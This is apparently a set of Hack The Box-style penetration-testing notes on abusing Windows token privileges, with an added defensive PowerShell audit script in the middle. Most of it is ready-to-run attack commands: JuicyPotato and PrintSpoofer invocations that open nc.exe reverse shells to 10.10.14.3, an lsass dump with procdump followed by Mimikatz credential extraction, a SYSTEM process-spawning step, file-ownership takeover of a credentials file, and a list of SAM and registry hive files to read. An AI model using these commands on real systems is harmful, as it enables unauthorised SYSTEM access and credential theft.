Windows User Privileges
SeImpersonate Privilege
Attackers often abuse this privilege in "Potato-style" privilege escalations, where a service account holds SeImpersonatePrivilege but does not have full SYSTEM-level privileges.
JuicyPotato Method
https://github.com/ohpe/juicy-potato
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
PrintSpoofer Method
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.
https://github.com/itm4n/PrintSpoofer
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
SeDebugPrivilege
To run a particular application or service, or to assist with troubleshooting, a user might be assigned SeDebugPrivilege instead of being added to the local Administrators group.
We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.
Dump Lsass
1. Dump the lsass process
procdump.exe -accepteula -ma lsass.exe lsass.dmp
2. Load the dump in Mimikatz and extract credentials
# Specify Dump File
sekurlsa::minidump lsass.dmp
# Dump Creds
sekurlsa::logonpasswords
RCE
https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
1. List processes
tasklist /svc
2. Use the PoC script (the first argument is the PID of a SYSTEM-owned process chosen from the tasklist output)
[MyProcess]::CreateProcessFromParent(612,"c:\Windows\System32\cmd.exe","")
SeTakeOwnershipPrivilege
SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.
https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1
1. Enable the privilege
# Import Module
Import-Module .\Enable-Privilege.ps1
# Run Script
.\EnableAllTokenPrivs.ps1
# Verify
whoami /priv
2. Check file ownership
cmd /c dir /q 'C:\Department Shares\Private\IT'
3. Take ownership of the file
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
4. Confirm ownership
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
5. Modify the ACL on the file
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
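As an added defender-side example (not part of these notes), the following PowerShell audit exports the local User Rights Assignment with secedit and reports which accounts hold the three privileges covered above, flagging any holder outside the Windows default assignments. It assumes secedit.exe is on PATH and that the session is allowed to export the local policy; the baseline SIDs are the documented Windows defaults.

```powershell
# Added audit example (not from the original notes). Reports who holds the
# privileges discussed on this page so unexpected service accounts can be reviewed.
# Assumes secedit.exe is available and the session may export local policy.

# Windows default holders per privilege (well-known SIDs, as written by secedit)
$Baseline = @{
    'SeImpersonatePrivilege'   = @('*S-1-5-32-544', '*S-1-5-19', '*S-1-5-20', '*S-1-5-6') # Administrators, LOCAL SERVICE, NETWORK SERVICE, SERVICE
    'SeDebugPrivilege'         = @('*S-1-5-32-544')                                       # Administrators
    'SeTakeOwnershipPrivilege' = @('*S-1-5-32-544')                                       # Administrators
}
$Cfg = Join-Path $env:TEMP 'user-rights-audit.inf'

# Export only the User Rights Assignment area of the local security policy
secedit /export /cfg $Cfg /areas USER_RIGHTS | Out-Null

# Exported lines look like: SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-...-1105
$Report = foreach ($Line in Get-Content -Path $Cfg) {
    if ($Line -notmatch '^(?<priv>Se\w+Privilege)\s*=\s*(?<holders>.+)$') { continue }
    $Priv = $Matches['priv']
    if (-not $Baseline.ContainsKey($Priv)) { continue }
    foreach ($Entry in ($Matches['holders'] -split ',')) {
        $Raw = $Entry.Trim()
        $Holder = $Raw
        # Entries are SIDs prefixed with '*'; resolve to account names where possible
        if ($Raw.StartsWith('*')) {
            try {
                $Sid    = [System.Security.Principal.SecurityIdentifier]($Raw.Substring(1))
                $Holder = $Sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch { }
        }
        [pscustomobject]@{
            Privilege  = $Priv
            Holder     = $Holder
            # Anything outside the default set is a candidate for review
            IsDefault  = ($Baseline[$Priv] -contains $Raw)
        }
    }
}

Remove-Item -Path $Cfg -ErrorAction SilentlyContinue
$Report | Sort-Object Privilege, IsDefault | Format-Table -AutoSize
```

Rows with IsDefault False are the accounts worth checking against change records, since a service account holding any of these rights is exactly the precondition the techniques above rely on.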
Interesting Files to Read
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav